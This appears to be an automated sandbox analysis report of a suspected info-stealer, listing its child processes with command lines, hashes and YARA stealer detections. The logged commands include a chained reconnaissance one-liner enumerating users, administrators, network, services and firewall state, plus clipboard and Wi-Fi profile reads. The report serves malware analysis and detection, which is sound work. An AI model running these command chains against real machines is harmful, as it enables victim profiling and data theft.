                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:04:46:17
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:04:46:17
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                                                                        Imagebase:0x7ff7a4af0000
                                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:cmd.exe /c chcp
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:cmd.exe /c chcp
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:chcp
                                                                                                                                                                                                                                        Imagebase:0x7ff706090000
                                                                                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:chcp
                                                                                                                                                                                                                                        Imagebase:0x7ff706090000
                                                                                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                        Imagebase:0x7ff7a4af0000
                                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell.exe Get-Clipboard
                                                                                                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:systeminfo
                                                                                                                                                                                                                                        Imagebase:0x7ff6af120000
                                                                                                                                                                                                                                        File size:110'080 bytes
                                                                                                                                                                                                                                        MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:netsh wlan show profiles
                                                                                                                                                                                                                                        Imagebase:0x7ff723720000
                                                                                                                                                                                                                                        File size:96'768 bytes
                                                                                                                                                                                                                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                        Start time:04:46:19
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                        Imagebase:0x7ff6616b0000
                                                                                                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                        Start time:04:46:20
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\HOSTNAME.EXE
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:hostname
                                                                                                                                                                                                                                        Imagebase:0x7ff781f10000
                                                                                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                                                                                        MD5 hash:33AFAA43B84BDEAB12E02F9DBD2B2EE0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                        Start time:04:46:20
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic logicaldisk get caption,description,providername
                                                                                                                                                                                                                                        Imagebase:0x7ff7bc2b0000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:04:46:22
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:net user
                                                                                                                                                                                                                                        Imagebase:0x7ff7ab1d0000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                        Start time:04:46:22
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\net1 user
                                                                                                                                                                                                                                        Imagebase:0x7ff661450000
                                                                                                                                                                                                                                        File size:183'808 bytes
                                                                                                                                                                                                                                        MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:04:46:22
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\query.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:query user
                                                                                                                                                                                                                                        Imagebase:0x7ff622880000
                                                                                                                                                                                                                                        File size:17'408 bytes
                                                                                                                                                                                                                                        MD5 hash:29043BC0B0F99EAFF36CAD35CBEE8D45
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:04:46:22
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\quser.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\quser.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff6cae20000
                                                                                                                                                                                                                                        File size:25'600 bytes
                                                                                                                                                                                                                                        MD5 hash:480868AEBA9C04CA04D641D5ED29937B
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:04:46:22
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:net localgroup
                                                                                                                                                                                                                                        Imagebase:0x7ff7ab1d0000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\net1 localgroup
                                                                                                                                                                                                                                        Imagebase:0x7ff661450000
                                                                                                                                                                                                                                        File size:183'808 bytes
                                                                                                                                                                                                                                        MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:net localgroup administrators
                                                                                                                                                                                                                                        Imagebase:0x7ff7ab1d0000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\net1 localgroup administrators
                                                                                                                                                                                                                                        Imagebase:0x7ff661450000
                                                                                                                                                                                                                                        File size:183'808 bytes
                                                                                                                                                                                                                                        MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:net user guest
                                                                                                                                                                                                                                        Imagebase:0x7ff7ab1d0000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\net1 user guest
                                                                                                                                                                                                                                        Imagebase:0x7ff661450000
                                                                                                                                                                                                                                        File size:183'808 bytes
                                                                                                                                                                                                                                        MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:net user administrator
                                                                                                                                                                                                                                        Imagebase:0x7ff7ab1d0000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\net1 user administrator
                                                                                                                                                                                                                                        Imagebase:0x7ff661450000
                                                                                                                                                                                                                                        File size:183'808 bytes
                                                                                                                                                                                                                                        MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff652c90000
                                                                                                                                                                                                                                        File size:13'747'712 bytes
                                                                                                                                                                                                                                        MD5 hash:4FD34971F2551E33806360BA5EE86E5E
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 39%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                        Start time:04:46:24
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                        Start time:04:46:24
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic startup get caption,command
                                                                                                                                                                                                                                        Imagebase:0x7ff7bc2b0000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                        Start time:04:46:26
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist /svc
                                                                                                                                                                                                                                        Imagebase:0x7ff7a4af0000
                                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                        Start time:04:46:27
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:ipconfig /all
                                                                                                                                                                                                                                        Imagebase:0x7ff67fed0000
                                                                                                                                                                                                                                        File size:35'840 bytes
                                                                                                                                                                                                                                        MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:42
